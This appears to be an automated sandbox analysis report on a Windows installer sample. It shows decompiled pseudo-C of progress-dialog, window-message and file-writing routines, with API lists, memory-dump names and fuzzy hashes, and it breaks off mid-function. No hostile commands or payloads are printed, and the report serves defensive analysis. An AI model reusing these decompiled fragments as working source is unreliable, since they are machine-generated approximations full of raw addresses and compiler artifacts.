                                                                                                                                                                                                          0x004043c0
                                                                                                                                                                                                          0x004043c8
                                                                                                                                                                                                          0x004043ce
                                                                                                                                                                                                          0x004043ce
                                                                                                                                                                                                          0x004043d8
                                                                                                                                                                                                          0x004043dd
                                                                                                                                                                                                          0x004043e0
                                                                                                                                                                                                          0x004043e5
                                                                                                                                                                                                          0x004043e8
                                                                                                                                                                                                          0x004043e8
                                                                                                                                                                                                          0x004043f8
                                                                                                                                                                                                          0x004043f8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004043fb

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                                                          • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                                                                                                                                          • Instruction ID: 4e7267cb447ae131ba3d4846a02e3cb7cb8ad683d93e4e28d2f19cfe4ef5bf63
                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A02174B15007049FCB319F78ED48B5BBBF8AF41714B04892EED96A26E1D738E914CB54
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 72E324D8, Relevance: 10.6, APIs: 7, Instructions: 124COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                                          			E72E324D8(intOrPtr* _a4) {
				char _v80;
				int _v84;
				intOrPtr _v88;
				short _v92;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr _t31;
				signed int _t43;
				void* _t44;
				intOrPtr _t45;
				void* _t48;

				_t44 = E72E31215();
				_t28 = _a4;
				_t45 =  *((intOrPtr*)(_t28 + 0x814));
				_v88 = _t45;
				_t48 = (_t45 + 0x41 << 5) + _t28;
				do {
					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
					}
					_t43 =  *(_t48 - 8) & 0x000000ff;
					if(_t43 <= 7) {
						switch( *((intOrPtr*)(_t43 * 4 +  &M72E32626))) {
							case 0:
								 *_t44 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									_v84 = __ecx;
									__ecx =  *(0x72e3307c + __edx * 4);
									__edx = _v84;
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x72e3309c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E72E31429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__eax = lstrcpynA(__edi,  *__eax,  *0x72e3405c);
								goto L17;
							case 4:
								__ecx =  *0x72e3405c;
								__edx = __ecx - 1;
								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
								__eax =  *0x72e3405c;
								 *((char*)(__eax + __edi - 1)) = __bl;
								goto L17;
							case 5:
								__ecx =  &_v80;
								_push(0x27);
								_push(__ecx);
								_push( *__eax);
								__imp__StringFromGUID2();
								__eax =  &_v92;
								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x72e3405c, __ebx, __ebx);
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfA(__edi, 0x72e34000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t30 =  *(_t48 + 0x14);
					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
						GlobalFree(_t30);
					}
					_t31 =  *((intOrPtr*)(_t48 + 0xc));
					if(_t31 != 0) {
						if(_t31 != 0xffffffff) {
							if(_t31 > 0) {
								E72E312D1(_t31 - 1, _t44);
								goto L26;
							}
						} else {
							E72E31266(_t44);
							L26:
						}
					}
					_v88 = _v88 - 1;
					_t48 = _t48 - 0x20;
				} while (_v88 >= 0);
				return GlobalFree(_t44);
			}














                                                                                                                                                                                                          0x72e324e4
                                                                                                                                                                                                          0x72e324e6
                                                                                                                                                                                                          0x72e324f0
                                                                                                                                                                                                          0x72e324f6
                                                                                                                                                                                                          0x72e32500
                                                                                                                                                                                                          0x72e32504
                                                                                                                                                                                                          0x72e32509
                                                                                                                                                                                                          0x72e32509
                                                                                                                                                                                                          0x72e32511
                                                                                                                                                                                                          0x72e32518
                                                                                                                                                                                                          0x72e3251e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e32525
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3252c
                                                                                                                                                                                                          0x72e32530
                                                                                                                                                                                                          0x72e32533
                                                                                                                                                                                                          0x72e32537
                                                                                                                                                                                                          0x72e3253e
                                                                                                                                                                                                          0x72e32542
                                                                                                                                                                                                          0x72e32548
                                                                                                                                                                                                          0x72e3254a
                                                                                                                                                                                                          0x72e3254c
                                                                                                                                                                                                          0x72e3254c
                                                                                                                                                                                                          0x72e32553
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3255c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3256c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e32598
                                                                                                                                                                                                          0x72e325a0
                                                                                                                                                                                                          0x72e325aa
                                                                                                                                                                                                          0x72e325ac
                                                                                                                                                                                                          0x72e325b1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e32574
                                                                                                                                                                                                          0x72e32578
                                                                                                                                                                                                          0x72e3257a
                                                                                                                                                                                                          0x72e3257b
                                                                                                                                                                                                          0x72e3257d
                                                                                                                                                                                                          0x72e3258d
                                                                                                                                                                                                          0x72e32594
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e325b7
                                                                                                                                                                                                          0x72e325b9
                                                                                                                                                                                                          0x72e325bf
                                                                                                                                                                                                          0x72e325c5
                                                                                                                                                                                                          0x72e325c5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3251e
                                                                                                                                                                                                          0x72e325c8
                                                                                                                                                                                                          0x72e325c8
                                                                                                                                                                                                          0x72e325cd
                                                                                                                                                                                                          0x72e325de
                                                                                                                                                                                                          0x72e325de
                                                                                                                                                                                                          0x72e325e4
                                                                                                                                                                                                          0x72e325e9
                                                                                                                                                                                                          0x72e325ee
                                                                                                                                                                                                          0x72e325fa
                                                                                                                                                                                                          0x72e325ff
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e32604
                                                                                                                                                                                                          0x72e325f0
                                                                                                                                                                                                          0x72e325f1
                                                                                                                                                                                                          0x72e32605
                                                                                                                                                                                                          0x72e32605
                                                                                                                                                                                                          0x72e325ee
                                                                                                                                                                                                          0x72e32606
                                                                                                                                                                                                          0x72e3260a
                                                                                                                                                                                                          0x72e3260d
                                                                                                                                                                                                          0x72e32625

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 72E31215: GlobalAlloc.KERNEL32(00000040,72E31233,?,72E312CF,-72E3404B,72E311AB,-000000A0), ref: 72E3121D
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 72E325DE
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 72E32618
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167878164.0000000072E31000.00000020.00020000.sdmp, Offset: 72E30000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167873253.0000000072E30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167884351.0000000072E33000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167889901.0000000072E35000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1780285237-0
                                                                                                                                                                                                          • Opcode ID: 9c94593cc379b04c299d037a44d3b706daa52f8e7566c70e8ee19004d99b45a1
                                                                                                                                                                                                          • Instruction ID: 9777790b03758c57251f235227cfc8f5fe57068452d5304f714e56acc3294259
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c94593cc379b04c299d037a44d3b706daa52f8e7566c70e8ee19004d99b45a1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A641BF77508204EFD3038F58DCA4D2A7BBEEB85306B90896DF58186152D7319E54DF62
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405374, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00405374(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ec24; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42f514;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004062E0(0, _t39, 0x42a098, 0x42a098, _a4);
					}
					_t26 = lstrlenA(0x42a098);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42ec08, 0x42a098);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42a098;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a098)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x42a098, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                                                                                                                                          0x0040537a
                                                                                                                                                                                                          0x00405386
                                                                                                                                                                                                          0x00405389
                                                                                                                                                                                                          0x0040538f
                                                                                                                                                                                                          0x0040539b
                                                                                                                                                                                                          0x0040539e
                                                                                                                                                                                                          0x004053a1
                                                                                                                                                                                                          0x004053a7
                                                                                                                                                                                                          0x004053a7
                                                                                                                                                                                                          0x004053ad
                                                                                                                                                                                                          0x004053b5
                                                                                                                                                                                                          0x004053b8
                                                                                                                                                                                                          0x004053d5
                                                                                                                                                                                                          0x004053d9
                                                                                                                                                                                                          0x004053e2
                                                                                                                                                                                                          0x004053e2
                                                                                                                                                                                                          0x004053ec
                                                                                                                                                                                                          0x004053f5
                                                                                                                                                                                                          0x00405401
                                                                                                                                                                                                          0x00405408
                                                                                                                                                                                                          0x0040540c
                                                                                                                                                                                                          0x0040540f
                                                                                                                                                                                                          0x00405422
                                                                                                                                                                                                          0x00405430
                                                                                                                                                                                                          0x00405430
                                                                                                                                                                                                          0x00405434
                                                                                                                                                                                                          0x00405436
                                                                                                                                                                                                          0x00405439
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405439
                                                                                                                                                                                                          0x004053ba
                                                                                                                                                                                                          0x004053c2
                                                                                                                                                                                                          0x004053ca
                                                                                                                                                                                                          0x004053d0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004053d0
                                                                                                                                                                                                          0x004053ca
                                                                                                                                                                                                          0x004053b8
                                                                                                                                                                                                          0x00405443

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                                                                                                                                          • lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                                                                                                                                          • lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                                                                                                                                          • SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00405408
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00405422
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00405430
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2531174081-0
                                                                                                                                                                                                          • Opcode ID: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
                                                                                                                                                                                                          • Instruction ID: d7eb592bfa4ea3045ae5f44a809824ecf19421b2f71a9c0c58d32ef0e79f5504
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0421AC71D00118BFCB11AFA5DD80ADEBFA9EF05354F50807AF904B22A0C7788E958B68
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00402E52, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00402E52(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x42946c;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x42946c = 0;
					return _t15;
				}
				if( *0x42946c != 0) {
					return E00406692(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42f450) {
					if( *0x42f448 == 0) {
						_t7 = CreateDialogParamA( *0x42f440, 0x6f, 0, E00402DBA, 0);
						 *0x42946c = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42f514 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402E36());
						return E00405374(0,  &_v68);
					}
				}
				return _t6;
			}







                                                                                                                                                                                                          0x00402e5e
                                                                                                                                                                                                          0x00402e60
                                                                                                                                                                                                          0x00402e67
                                                                                                                                                                                                          0x00402e6a
                                                                                                                                                                                                          0x00402e6a
                                                                                                                                                                                                          0x00402e70
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00402e70
                                                                                                                                                                                                          0x00402e7e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00402e81
                                                                                                                                                                                                          0x00402e88
                                                                                                                                                                                                          0x00402e94
                                                                                                                                                                                                          0x00402e9c
                                                                                                                                                                                                          0x00402eda
                                                                                                                                                                                                          0x00402ee3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00402ee8
                                                                                                                                                                                                          0x00402ea5
                                                                                                                                                                                                          0x00402eb6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00402ec4
                                                                                                                                                                                                          0x00402ea5
                                                                                                                                                                                                          0x00402ef0

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • DestroyWindow.USER32 ref: 00402E6A
                                                                                                                                                                                                          • GetTickCount.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040306E), ref: 00402E88
                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00402EB6
                                                                                                                                                                                                            • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                                                                                                                                            • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                                                                                                                                            • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                                                                                                                                            • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405408
                                                                                                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405422
                                                                                                                                                                                                            • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405430
                                                                                                                                                                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402EDA
                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402EE8
                                                                                                                                                                                                            • Part of subcall function 00402E36: MulDiv.KERNEL32 ref: 00402E4B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                                                                          • String ID: ... %d%%
                                                                                                                                                                                                          • API String ID: 722711167-2449383134
                                                                                                                                                                                                          • Opcode ID: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
                                                                                                                                                                                                          • Instruction ID: 353ceaab55596b447025a7e101de02e0418331127a37b2bc27e5d18c7d4c6952
                                                                                                                                                                                                          • Opcode Fuzzy Hash: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA015E70581214ABCB61AB61EF0DA5B766CAB10745B94403BF901F11E0C7B9594ACBEE
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00404C24, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00404C24(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                                                                                                                          0x00404c32
                                                                                                                                                                                                          0x00404c3f
                                                                                                                                                                                                          0x00404c45
                                                                                                                                                                                                          0x00404c83
                                                                                                                                                                                                          0x00404c83
                                                                                                                                                                                                          0x00404c92
                                                                                                                                                                                                          0x00404c99
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404c9b
                                                                                                                                                                                                          0x00404c47
                                                                                                                                                                                                          0x00404c56
                                                                                                                                                                                                          0x00404c5e
                                                                                                                                                                                                          0x00404c61
                                                                                                                                                                                                          0x00404c73
                                                                                                                                                                                                          0x00404c79
                                                                                                                                                                                                          0x00404c80
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404c80
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                                                          • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                                                                                                                                          • Instruction ID: c5e601a7729174d758105895f59292295b70f69fbdb61488410ae18d48939760
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8015A71900219BAEB10DBA4DD85BFFBBBCAF55B21F10012BBA40B61D0C7B499058BA4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00402DBA, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402E36();
					_t19 = "unpacking data: %d%%";
					if( *0x42f454 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                                                                                                                                          0x00402dc7
                                                                                                                                                                                                          0x00402dd5
                                                                                                                                                                                                          0x00402ddb
                                                                                                                                                                                                          0x00402ddb
                                                                                                                                                                                                          0x00402de9
                                                                                                                                                                                                          0x00402deb
                                                                                                                                                                                                          0x00402df7
                                                                                                                                                                                                          0x00402dfc
                                                                                                                                                                                                          0x00402dfe
                                                                                                                                                                                                          0x00402dfe
                                                                                                                                                                                                          0x00402e09
                                                                                                                                                                                                          0x00402e19
                                                                                                                                                                                                          0x00402e2b
                                                                                                                                                                                                          0x00402e2b
                                                                                                                                                                                                          0x00402e33

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00402E09
                                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 00402E19
                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E2B
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                                                                          • API String ID: 1451636040-1158693248
                                                                                                                                                                                                          • Opcode ID: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
                                                                                                                                                                                                          • Instruction ID: aa0a6e9b687c9e0f5cd6186ccbd59e0a61a019e4c0b35091a05eaf10890a9e1d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5F06D7054020CFBEF206F60CE0ABAE3769EB10345F00803AFA06B51D0CBB899558F9A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                          			E004027DF(void* __ebx, void* __eflags) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405C52(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405DC1(_t50);
				_t26 = E00405DE6(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42f458;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E0040343E(_t45);
						E00403428(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
